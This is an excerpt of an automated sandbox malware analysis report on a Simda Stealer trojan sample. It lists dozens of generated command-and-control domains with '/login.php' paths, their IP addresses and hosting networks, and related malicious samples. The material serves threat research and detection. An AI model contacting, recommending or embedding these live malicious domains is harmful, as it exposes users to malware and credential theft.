                                                                                                                                                                                                          http://gahyvuh.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzyduq.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetynup.com/Hsvchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pumybuq.com/svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473737511.0000000006676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzydal.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahyzez.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galyvas.com/login.phpsvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puryxag.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063935893.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://qegyhig.com/wp-json/svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796639933.0000000006795000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volyzic.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499203809.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojycec.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2510214419.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2520844909.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2517095584.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gatyfus.com/login.phpsvchost.exe, 00000002.00000003.2521249928.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349320135.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474446421.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360289865.000000000673E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2491632486.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2545737260.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1373797577.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360701131.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1415492981.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269117845.000000000084C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2585293008.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150807320.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413994603.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2439022495.000000000084C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357632057.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571812.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373341442.000000000084C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyrytun.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvyjox.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxyfar.com/psvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegytyv.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahypus.com/login.phpcom/login.phpsvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volydot.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lykyvod.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373519740.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369279850.00000000066A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pujydap.com/login.phpsvchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599280642.00000000046FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzywel.com/svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pujydap.com/http://ganykah.com/http://volygyt.com/http://pupyxuq.com/http://pupyxuq.com/svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadyneh.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          3.94.10.34
                                                                                                                                                                                                          lymyxid.comUnited States
                                                                                                                                                                                                          14618AMAZON-AESUStrue
                                                                                                                                                                                                          15.197.240.20
                                                                                                                                                                                                          qexyhuv.comUnited States
                                                                                                                                                                                                          7430TANDEMUStrue
                                                                                                                                                                                                          64.190.63.136
                                                                                                                                                                                                          www.sedoparking.comUnited States
                                                                                                                                                                                                          11696NBS11696UStrue
                                                                                                                                                                                                          106.15.36.143
                                                                                                                                                                                                          unknownChina
                                                                                                                                                                                                          37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                          72.52.179.174
                                                                                                                                                                                                          pltraffic7.comUnited States
                                                                                                                                                                                                          32244LIQUIDWEBUStrue
                                                                                                                                                                                                          103.224.212.108
                                                                                                                                                                                                          lyxynyx.comAustralia
                                                                                                                                                                                                          133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                          154.85.183.50
                                                                                                                                                                                                          qegyval.comSeychelles
                                                                                                                                                                                                          134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                                                          64.225.91.73
                                                                                                                                                                                                          galynuh.comUnited States
                                                                                                                                                                                                          14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                          52.34.198.229
                                                                                                                                                                                                          lygyvuj.comUnited States
                                                                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                                                                          5.79.71.225
                                                                                                                                                                                                          gatyfus.comNetherlands
                                                                                                                                                                                                          60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                                                                                                                          199.191.50.83
                                                                                                                                                                                                          galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                          40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                          13.248.169.48
                                                                                                                                                                                                          pupydeq.comUnited States
                                                                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                                                                          18.208.156.248
                                                                                                                                                                                                          pupycag.comUnited States
                                                                                                                                                                                                          14618AMAZON-AESUStrue
                                                                                                                                                                                                          208.100.26.245
                                                                                                                                                                                                          lyvyxor.comUnited States
                                                                                                                                                                                                          32748STEADFASTUStrue
                                                                                                                                                                                                          103.224.182.252
                                                                                                                                                                                                          vofycot.comAustralia
                                                                                                                                                                                                          133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                          199.59.243.226
                                                                                                                                                                                                          77026.bodis.comUnited States
                                                                                                                                                                                                          395082BODIS-NJUStrue
                                                                                                                                                                                                          103.150.11.230
                                                                                                                                                                                                          gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                          59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                          3.64.163.50
                                                                                                                                                                                                          puzylyp.comUnited States
                                                                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                                                                          91.195.240.19
                                                                                                                                                                                                          parkingpage.namecheap.comGermany
                                                                                                                                                                                                          47846SEDO-ASDEtrue
                                                                                                                                                                                                          162.255.119.102
                                                                                                                                                                                                          gahyqah.comUnited States
                                                                                                                                                                                                          22612NAMECHEAP-NETUStrue
                                                                                                                                                                                                          44.221.84.105
                                                                                                                                                                                                          gadyciz.comUnited States
                                                                                                                                                                                                          14618AMAZON-AESUStrue
                                                                                                                                                                                                          154.212.231.82
                                                                                                                                                                                                          gadyniw.comSeychelles
                                                                                                                                                                                                          133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                                                                                                                          188.114.96.3
                                                                                                                                                                                                          lysyvan.comEuropean Union
                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                          69.162.80.55
                                                                                                                                                                                                          lysyfyj.comUnited States
                                                                                                                                                                                                          46475LIMESTONENETWORKSUStrue
                                                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                          Analysis ID:1507240
                                                                                                                                                                                                          Start date and time:2024-09-08 10:51:40 +02:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 10m 6s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:25
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:15
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:OjKmJJm2YT.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:Virus.Hijack.ATA_virussign.com_ca30350fdb8b854abac0a08aa08ff89a.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.bank.troj.spyw.expl.evad.winEXE@7/34@2017/24
                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                                                                          • Number of executed functions: 78
                                                                                                                                                                                                          • Number of non-executed functions: 238
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.23.209.142, 2.23.209.133, 2.23.209.144, 2.23.209.135, 2.23.209.140, 2.23.209.192, 2.23.209.149, 2.23.209.136, 2.23.209.143, 2.23.209.160, 2.23.209.167, 2.23.209.161, 2.23.209.176, 2.23.209.166, 2.23.209.162, 2.23.209.168, 2.23.209.173, 2.23.209.171, 20.189.173.22
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: OjKmJJm2YT.exe
                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          04:53:14API Interceptor23650x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                          04:53:15API Interceptor4x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          3.94.10.345AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lymyxid.com/login.php
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lymyxid.com/login.php
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lymyxid.com/login.php
                                                                                                                                                                                                          TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                          • ypituyqsq.biz/yjhyaromqq
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lymyxid.com/login.php
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lymyxid.com/login.php
                                                                                                                                                                                                          7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • thoughprobable.net/index.php
                                                                                                                                                                                                          7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • thoughprobable.net/index.php
                                                                                                                                                                                                          5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • thoughprobable.net/index.php
                                                                                                                                                                                                          5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • thoughprobable.net/index.php
                                                                                                                                                                                                          15.197.240.205AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • qexyhuv.com/login.php
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • qexyhuv.com/login.php
                                                                                                                                                                                                          0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.marinamaquiagens.online/n4sv/
                                                                                                                                                                                                          8htbxM8GPX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.donnavariedades.com/fo8o/
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • qexyhuv.com/login.php
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • qexyhuv.com/login.php
                                                                                                                                                                                                          rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.donnavariedades.com/fo8o/
                                                                                                                                                                                                          QLLafoDdqv.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.donnavariedades.com/fo8o/
                                                                                                                                                                                                          LF2024022.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                          • www.johnasian.com/jn17/?AjFxkn=AUopA6EtHNKAXsGcnergFbbGiEMiDoIvdiVznSugjPZqqO5N3A9xjJjKmrW26oeiLAOH&Yxl0T=CPqtRfop
                                                                                                                                                                                                          UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.id91920.com/fs83/?K6kd=8lIozjCqSLfPDorgIcX1ftJlpRSaTueiBgmxgg5HldscziyRpsyXpMHH8F7QpJEOuhLDcFmkzQ==&uTrL=_bj8lfEpU
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          77026.bodis.com5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          AxgZVzUv8m.exeGet hashmaliciousPonyBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          https://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          https://emv1.jo333.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          https://www.jo333.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          https://emv1.lqhyhy.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 199.59.243.226
